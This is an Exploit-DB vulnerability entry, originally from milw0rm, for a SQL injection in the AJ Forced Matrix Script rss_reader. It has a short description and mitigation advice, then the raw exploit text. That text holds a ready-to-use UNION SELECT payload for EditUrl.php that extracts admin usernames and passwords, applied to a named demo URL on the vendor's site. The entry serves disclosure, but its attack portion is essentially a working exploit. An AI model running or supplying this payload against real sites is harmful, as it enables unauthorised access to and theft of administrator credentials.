AJ Forced Matrix Script Remote SQL Injection Vulnerability

vendor:

AJ Forced Matrix Script

by:

yassine_enp

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: AJ Forced Matrix Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

AJ Forced Matrix Script Remote SQL Injection Vulnerability

AJ Forced Matrix Script is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data does not get passed to the SQL server. All input data should be validated and filtered, and all SQL queries should use parameterized statements.

Source

Exploit-DB raw data:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              AJ Forced Matrix Script   Remote SQL Injection Vulnerability                                        +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =           Discovered By: yassine_enp  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =               :::::Mail: e1np@hotmail.com:::::::             =     =
                =                                                                                    =
                =        = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::=         =
                =               nome de script :rss_reader
                                                                     =
                ======================================yassine_enp===================================


Exploit(1):
********

www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--

Demo
________

http://www.ajsquare.com/resources/rss_reader/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--


                                
                                                    

===================================================================================================================

Mr.HCOCA_MAN:::DrEaDFuL:::super cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members 

===================================================================================================================
                                  
                                                          ::::e1np@Hotmail.CoM::::

# milw0rm.com [2008-10-24]